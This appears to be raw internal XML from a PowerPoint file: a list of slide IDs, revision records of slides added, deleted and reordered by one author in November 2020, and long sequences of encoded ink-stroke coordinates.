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26" r:id="rId2"/>
    <p:sldId id="341" r:id="rId3"/>
    <p:sldId id="449" r:id="rId4"/>
    <p:sldId id="460" r:id="rId5"/>
    <p:sldId id="461" r:id="rId6"/>
    <p:sldId id="464" r:id="rId7"/>
    <p:sldId id="466" r:id="rId8"/>
    <p:sldId id="343" r:id="rId9"/>
    <p:sldId id="374" r:id="rId10"/>
    <p:sldId id="428" r:id="rId11"/>
    <p:sldId id="375" r:id="rId12"/>
    <p:sldId id="377" r:id="rId13"/>
    <p:sldId id="378" r:id="rId14"/>
    <p:sldId id="382" r:id="rId15"/>
    <p:sldId id="430" r:id="rId16"/>
    <p:sldId id="388" r:id="rId17"/>
    <p:sldId id="394" r:id="rId18"/>
    <p:sldId id="399" r:id="rId19"/>
    <p:sldId id="400" r:id="rId20"/>
    <p:sldId id="433" r:id="rId21"/>
    <p:sldId id="402" r:id="rId22"/>
    <p:sldId id="305" r:id="rId23"/>
    <p:sldId id="364" r:id="rId24"/>
    <p:sldId id="441" r:id="rId25"/>
    <p:sldId id="366" r:id="rId26"/>
    <p:sldId id="370" r:id="rId27"/>
    <p:sldId id="371" r:id="rId28"/>
    <p:sldId id="372" r:id="rId29"/>
    <p:sldId id="359" r:id="rId30"/>
    <p:sldId id="469" r:id="rId31"/>
    <p:sldId id="478" r:id="rId32"/>
    <p:sldId id="476" r:id="rId33"/>
    <p:sldId id="383" r:id="rId34"/>
    <p:sldId id="438" r:id="rId35"/>
    <p:sldId id="477" r:id="rId36"/>
    <p:sldId id="463" r:id="rId37"/>
    <p:sldId id="386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D0EE8-7782-4F9F-A184-6D3CA3586E39}" v="3" dt="2020-11-23T15:37:37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19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CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}"/>
    <pc:docChg chg="addSld delSld modSld sldOrd">
      <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-24T07:36:09.598" v="59" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst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073586220" sldId="25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18208907" sldId="316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CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:25:33.294" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3230129895" sldId="335"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:35:03.057" v="41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958300443" sldId="339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057431200" sldId="340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1343995423" sldId="351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785368883" sldId="352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874360564" sldId="353"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:35:42.155" v="42" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3306482970" sldId="354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99376975" sldId="355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193818492" sldId="356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3834050388" sldId="357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1171971662" sldId="35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280197037" sldId="35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2296401636" sldId="359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584276701" sldId="361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350321975" sldId="362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898023219" sldId="363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35317018" sldId="364"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:33:14.769" v="29" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1383557001" sldId="36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81852333" sldId="366"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:33:31.110" v="32" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2915792444" sldId="367"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:33:23.651" v="30" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3682989002" sldId="368"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:33:27.215" v="31" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="713279862" sldId="369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773103033" sldId="370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828652044" sldId="37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CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:27:51.860" v="13" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="94239133" sldId="376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266199474" sldId="376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92560093" sldId="379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CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:28:04.189" v="15" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2641667682" sldId="380"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:28:08.276" v="16" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3302855305" sldId="381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3394434897" sldId="38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704459030" sldId="384"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-24T07:36:09.598" v="59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CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-24T07:36:09.598" v="59" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1334360895" sldId="386"/>
            <ac:spMk id="2" creationId="{3CD0DB78-AB5E-4845-BDA8-57563707A40A}"/>
          </ac:spMkLst>
        </pc:spChg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76729422" sldId="387"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:28:29.736" v="18" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1213134876" sldId="38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768310755" sldId="391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619645780" sldId="392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971020643" sldId="393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72341015" sldId="39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8761661" sldId="398"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-24T07:36:04.340" v="57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CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-24T07:36:04.340" v="57" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1067152736" sldId="402"/>
            <ac:spMk id="2" creationId="{A35B625F-DA6E-4DFB-AF8F-C92E97F5C5C8}"/>
          </ac:spMkLst>
        </pc:spChg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2808251" sldId="411"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:32:57.528" v="28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317277007" sldId="429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21662242" sldId="43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53262624" sldId="432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CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:27:31.106" v="10" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4117409162" sldId="434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1267997249" sldId="435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3216010588" sldId="436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2715642866" sldId="437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CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:25:46.212" v="2" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3983647624" sldId="43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71919" sldId="43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451106316" sldId="440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01848" sldId="440"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add ord">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:36:17.332" v="46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820321705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2607040475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700238070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864901960" sldId="443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977974222" sldId="443"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:33:39.858" v="34" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="480636073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449700447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713443693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1976344167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224965834" sldId="446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211985986" sldId="446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3719103758" sldId="447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77250534" sldId="447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625760957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11094813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15773256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10968194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826770376" sldId="45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217971390" sldId="45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605110631" sldId="452"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:26:11.658" v="4" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3650397043" sldId="452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629962386" sldId="453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1600761852" sldId="453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1291906013" sldId="454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866130153" sldId="454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462243918" sldId="455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80740525" sldId="455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361623568" sldId="456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681501289" sldId="456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011088463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64176872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838756640" sldId="458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124952347" sldId="458"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:34:55.171" v="39" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="557494082" sldId="459"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:26:45.001" v="6" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1096124257" sldId="459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973399520" sldId="462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3766473943" sldId="463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956652012" sldId="465"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:27:06.974" v="8" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3216535980" sldId="465"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:27:35.358" v="11" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1829467705" sldId="467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113301735" sldId="467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89113158" sldId="468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2921772423" sldId="46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441145510" sldId="469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1498306890" sldId="46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3948782123" sldId="46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737257765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1250088202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44832928" sldId="47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896242820" sldId="471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52397832" sldId="472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827526027" sldId="472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51207103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81269238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986747498" sldId="474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612628158" sldId="474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1371440257" sldId="475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449101246" sldId="47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483357656" sldId="476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565963150" sldId="47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4203446312" sldId="477"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{CD9D0EE8-7782-4F9F-A184-6D3CA3586E39}" dt="2020-11-23T15:37:37.611" v="49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2138855089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787008638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32447904" sldId="47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4163693901" sldId="479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775983338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96166211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81788556" sldId="48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1772708056" sldId="482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3018192824" sldId="483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1-22T20:03:15.162" v="7911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2T20:03:15.162" v="7911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08T20:37:49.953" v="4644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">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:45:05.129" v="6253" actId="1036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1-21T16:32:51.708" v="7005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20 457 472,'0'0'16252,"-19"-13"-13270,81-35-2742,-42 36-246,-2 0 0,31-26-1,5-2-50,-1-3 77,-23 23-5,7-9-9,17-7-146,-48 29 144,1 0 0,0 1 1,0 0-1,16-10 0,-8 0-36,-15 15 33,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 1 0,0-1-1,-1 0 1,1 0-1,0 1 1,0-1-1,0 0 1,0 1 0,-1-1-1,1 1 1,0-1-1,0 1 1,0 0-1,0-1 1,1 1-1,13-7 132,-12 5-131,1 0 1,-1-1-1,0 1 0,1-1 1,-1 1-1,0-1 1,-1 0-1,6-7 1,11-8-21,-18 18 19,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 0 0,-1 1 0,1-4 0,1 4 6,8-2 0,-11 1-3,1 1 20,-11 0 119,11 2-188,-1 12-60,-3-7 104,1 0-1,1 0 0,-1 0 0,1 1 0,0-1 0,1 1 0,0-1 0,-1 11 0,2 0-146,1-5 163,-1 0-1,-1-1 1,0 1-1,0 0 0,-6 21 1,5-23 8,0 0 1,1 0-1,0 1 1,1-1-1,0 0 1,2 18-1,0 10 0,9 23-2,-11 155 762,0-215-778,9-8-4025,-13 5 3638,-23-12-12587,17 13 9823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6 856,'13'-2'11873,"-3"-1"-9031,-6 3-2008,0 0-1,-1-1 1,1 1 0,0 1 0,0-1 0,-1 1-1,1-1 1,5 3 0,4 2-1110,-25-3-7370,5-2 5032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09:14:05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0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11 165 720,'0'0'2264,"0"7"522,0-8-2129,0-7 2139,1 8-2634,-1-1-1,0 0 1,0 1-1,1-1 1,-1 0 0,0 1-1,0-1 1,0 0 0,0 0-1,0 1 1,0-1-1,0 0 1,0 1 0,0-1-1,0 0 1,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,-1 0-1,1 1 1,0-1 0,-1 1-1,1-1 1,-1 1-1,1-1 1,-1 1 0,1-1-1,-1 1 1,1-1-1,-1 1 1,1-1 0,-1 1-1,0 0 1,1-1-1,-2 1 1,0 0 547,5-5-608,0 1-1,1-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,6-4 0,51-40-78,-34 28-23,-20 14 0,1 1 0,0 0 0,0 0 0,10-5 0,-17 9 3,1 1 0,-1-1 0,1 1 1,0-1-1,-1 1 0,1 0 0,0-1 0,-1 1 1,1 0-1,-1 0 0,1 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,1 0 0,-1-1 0,1 1 1,-1 0-1,0 0 0,1 0 0,-1 0 0,2 2 1,24 14 31,7 3 66,-23-11-87,-10-8-15,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,1 0-1,-1 1 1,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 3 0,10 37-19,-12-33 30,-1 0 0,1 0 0,-1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,-6 8 0,-9 25 17,8-23-20,-1-1-1,0 0 1,-1 0 0,-1-1-1,-1-1 1,0 0-1,-29 24 1,-32 14 7,30-34-40,21-11 52,25-22-1,2-2-28,1 9 3,1 0 0,-1 0 0,1 0 0,0 1 1,0 0-1,1 0 0,0 0 0,8-5 0,-1 1 61,-12 8-56,0 1 1,0-1 0,-1 1 0,1-1 0,0 1-1,0-1 1,-1 1 0,1 0 0,0-1 0,0 1 0,0 0-1,0 0 1,-1 0 0,1-1 0,0 1 0,0 0-1,0 0 1,0 0 0,0 1 0,-1-1 0,1 0-1,0 0 1,0 0 0,0 1 0,0-1 0,-1 0 0,1 1-1,0-1 1,0 1 0,-1-1 0,1 1 0,0-1-1,0 1 1,-1-1 0,1 1 0,0 1 0,21 10-62,1 0 1,1-2 0,26 9 0,-36-15 59,0-1-1,1-1 1,-1 0 0,26 0-1,-19 4-663,-14-2-3155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0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1476,'0'-3'1769,"0"-10"3704,9 0-2929,10 6 1569,-9 6-5700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1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 1008,'-9'-1'7313,"7"1"-6903,12 26 974,-9-24-1219,1 0 0,-1 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 0 1,0 1-1,-1-1 0,1 0 1,-1 4-1,11 25 1511,0 11 198,-22 18-797,5-34-815,6-24-248,-1-1-1,0 0 1,1 1-1,-1-1 1,1 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0-1-1,1 1 0,-1-1 1,1 1-1,-1-1 1,1 0-1,-1 1 1,1-1-1,0 0 1,0 1-1,1 1 1,3 11 48,-5-14-54,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 1 1,1-1-1,-1 0 0,0 1 1,0-1-1,0 1 0,1-1 1,-1 0-1,0 1 0,1-1 1,-1 0-1,0 0 0,0 1 1,1-1-1,-1 0 0,1 0 1,-1 1-1,1-1 0,14 12-523,-15-12 479,0 0 1,0 0-1,0 0 0,1 0 0,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-1 1 0,0-1 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,-1 0 0,1 1 1,0-1-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,-1 0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0 187 556,'1'-4'554,"1"-1"-1,-1 1 0,1 0 1,0-1-1,0 1 1,0 0-1,0 1 1,1-1-1,0 0 1,5-5-1,9-15 1199,-13 19-1493,1 0 1,0 0-1,-1 1 0,2-1 0,-1 1 0,0 0 1,1 1-1,0-1 0,0 1 0,12-5 0,29-19 998,-38 22-1048,0 0 0,1 0-1,0 1 1,0 1 0,0-1 0,0 2 0,0-1 0,1 1 0,-1 1-1,18-1 1,-23 3-187,-1-1 0,0 1 0,0 1 0,0-1 0,1 0 0,-1 1 0,-1 0 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 1-1,-1 0 1,0 0 0,0 0 0,0 0 0,3 4 0,-3-1 42,0 0 0,-1-1 0,0 1 0,0 0 0,0 0-1,-1 0 1,1 0 0,-1 0 0,-1 0 0,1 1 0,-2 6 0,1-10-24,-1 1 0,0-1 0,0 0 1,0 0-1,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 1,0 0-1,0-1 0,0 1 0,0-1 0,-1 0 0,1 1 1,-1-1-1,-4 2 0,-13 17 45,14-15-87,-1 0-1,1-1 1,-1 0 0,0 0 0,0 0 0,-16 6-1,12-4 24,9-6-17,0 0 8,-1 1 0,1 0 1,-1 0-1,1-1 1,-1 1-1,0-1 1,0 0-1,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0-1 0,0 1 1,0 0-1,0-1 1,0 0-1,-6-1 1,-3-4 44,11 6-31,0 0-1,0 0 1,0 0-1,0-1 0,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 0,0 1 1,1-1-1,-1 0 1,0 1-1,0-1 0,1 0 1,-1 0-1,0 1 1,1-1-1,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,1 0 1,-1-2-1,1 2 74,33 14 70,-25-12-55,0 1 0,0 0 1,1 1-1,-2 0 0,1 1 0,0-1 0,13 10 1,-12-8-52,27 19 316,-28-18-265,1-1 0,-1 1-1,1-1 1,0-1 0,0 0-1,11 4 1,-6-3 104,-1 1-1,1 1 0,-1 0 1,0 1-1,-1 0 0,0 1 1,11 11-1,44 29 609,-66-49-857,0 1-1,1-1 1,-1 1 0,0-1-1,0 0 1,1 1-1,-1-1 1,0 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,1 0 1,-1 0-1,0-1 1,0 1 0,2-1-1,3-4-1554,-11-1-3474,3-12-5264,2 10 5839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86 189 464,'33'-11'3716,"-20"6"-3413,0 0-1,-1-1 1,1 0-1,-1-1 1,0 0-1,-1-1 1,0 0-1,0-1 1,0 0 0,10-13-1,-19 20-105,0-1 1,0 1-1,0 0 0,0-1 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,0 0 1,0 0-1,0 0 0,-1 0 0,1 0 1,-1 0-1,0 0 0,1 0 0,-2-6 1,0 7 37,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 1,-1-1-1,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 1,0 0-1,0 0 0,-4-1 0,-4 2-85,0 0 0,0 1 1,0 0-1,0 1 0,0 0 0,0 0 1,0 1-1,0 0 0,1 1 0,0 0 0,0 0 1,0 1-1,0 1 0,1-1 0,0 1 0,-13 13 1,-3 5 215,19-20-333,1-1 0,0 1-1,0 0 1,0 1 0,1-1 0,-1 0-1,1 1 1,0 0 0,0 0 0,1 0-1,-1 0 1,1 0 0,0 0 0,1 1-1,-1-1 1,1 1 0,0-1 0,0 7-1,1-11-27,1 1 0,-1-1-1,0 1 1,1-1 0,0 0 0,-1 1-1,1-1 1,0 0 0,-1 1-1,1-1 1,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0-1 0,1 1-1,1 0 1,42 14 67,-25-9-44,-4-2-35,1-1-1,-1-1 1,0 0 0,1-1 0,0-1-1,24-3 1,11 0-343,14 3-2659,-26 0-5925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78 124 104,'0'0'94,"0"-1"0,0 1 0,0 0-1,0-1 1,1 1 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0-1,0-1 1,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1-1,0 1 1,0 0 0,0-1 0,0 1 0,0 0 0,-1-1 0,1 1-1,0 0 1,0-1 0,-1 1 0,1 0 0,0 0 0,0-1 0,-1 1 0,1 0-1,0 0 1,-1 0 0,1-1 0,0 1 0,-1 0 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0-1,0 0 1,-1 0 0,-42 17 4517,41-16-4430,0 1 0,0-1 0,1 1 1,-1-1-1,0 1 0,1-1 0,-1 1 1,1 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,0 3 0,0-2-168,1-1-1,-1 0 1,1 0-1,0 0 1,0 1-1,-1-1 1,2 0-1,-1 0 1,0 1-1,0-1 1,1 0-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 1 1,0-1-1,0-1 1,1 1-1,-1 0 1,0 0-1,0 0 1,1-1-1,-1 1 1,1 0-1,0-1 1,3 3-1,-1-1-6,1 0 0,0 0-1,0 0 1,0-1 0,0 0-1,0 0 1,1 0 0,-1 0-1,1-1 1,-1 0 0,1 0-1,-1-1 1,1 0 0,0 1-1,-1-2 1,1 1 0,-1-1-1,1 0 1,-1 0 0,9-3 0,-4 1-3,-1 0 1,1-1 0,-1-1 0,0 1-1,-1-1 1,1-1 0,-1 0 0,0 0-1,0 0 1,10-13 0,-6 7-1,10-18 4,-13 15 27,-7 13-29,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,-1 0 1,0 0-1,0-4 0,0 4 37,1-1-1,-1 1 1,0-1-1,0 1 1,-1-1 0,1 0-1,0 1 1,-1-1-1,0 1 1,0-1-1,1 1 1,-1 0-1,-1-1 1,1 1 0,0 0-1,0-1 1,-1 1-1,0 0 1,1 0-1,-5-3 1,3 2 50,-1 0 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1 1 0,-5 0 0,0-1-23,0 2-1,1-1 0,-1 2 1,1-1-1,-1 1 1,1 0-1,-14 8 1,20-9-68,1 0-1,-1 0 1,1 1 0,-1-1-1,1 1 1,0-1 0,0 1-1,0 0 1,0 0 0,0 0-1,1 0 1,0 0 0,-1 0 0,1 1-1,0-1 1,0 0 0,1 1-1,-1-1 1,1 1 0,0-1-1,0 0 1,0 1 0,0-1-1,1 5 1,-1-7-1,1 0 0,-1 1 0,1-1 1,-1 0-1,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,1 0 0,-1-1 0,3 2 0,28 10 34,-24-11-35,0 0 0,-1-1 1,1 1-1,0-2 0,0 1 1,0-1-1,0 0 0,0-1 1,0 0-1,-1 0 0,15-7 1,21-4 5,-43 13-3,1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0 0,0 1 0,0-1-1,0 0 1,-1 1 0,1-1 0,0 0-1,0 1 1,0-1 0,-1 1-1,1-1 1,0 1 0,-1 0 0,1-1-1,0 1 1,-1 0 0,1-1-1,-1 1 1,1 0 0,-1 0 0,1 0-1,-1-1 1,1 1 0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0 0 0,0-1 0,0 1-1,0 0 1,0 0 0,-1 2 0,2 52 408,-2-40-196,2-6-145,1 1 0,0-1-1,0 0 1,1 0 0,0 0-1,1 0 1,0-1 0,0 1 0,1-1-1,0 0 1,9 11 0,21 41 448,-24-43-436,-10-15-102,1 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1-1,-1 1 1,1-1 0,0 0 0,-1 1 0,0 0 0,1 4 0,2 10-735,-3-17 654,1 1 0,-1 0 0,0-1 0,0 1-1,1 0 1,-1 0 0,0-1 0,0 1 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,-1 0 0,1 0 0,0-1-1,0 1 1,-1 0 0,1-1 0,0 1 0,-1 0-1,-2 9-2796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49 112,'9'-14'2702,"-7"9"1123,-12-12 4179,3 8-6911,12 6-362,-4 52-10,0-45-699,-1 0 0,0 0 0,0 0 0,-1-1 0,1 1 1,-1 0-1,0 0 0,0-1 0,0 1 0,0 0 0,-3 3 1,4-3-10,-1 0 1,0 1-1,1-1 0,0 1 1,0-1-1,0 0 1,1 1-1,-1-1 1,1 0-1,0 1 1,2 3-1,2 25 44,-5-20-17,0-11-40,-1-1 1,1 1 0,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,1 0 0,-1-1-1,1 1 1,-1-1 0,1 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,0-1 0,0 0-1,1 2 1,-2-3-163,0 0 0,0 0 0,-1 0 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 1-1,1-1 1,0 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 1-1,-1-1 1,1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 1 0,-8-14-5976,8 2 2778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1 404,'0'0'3098,"-20"12"10097,39-9-13397,-16-1-870,0-1 1,0-1 0,0 1 0,1 0-1,-1-1 1,0 0 0,1 1-1,-1-1 1,0-1 0,1 1-1,4-1 1,3 0-1892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9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78 552,'11'-1'7939,"-11"17"-7065,1-10-658,-1-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,-1 0 0,-2 7 0,-3 19 602,7-28-717,0 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 0 1,-3 5-1,-6 22 1260,10-30-1338,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,1 1-1,-1 0 1,0 0-1,0 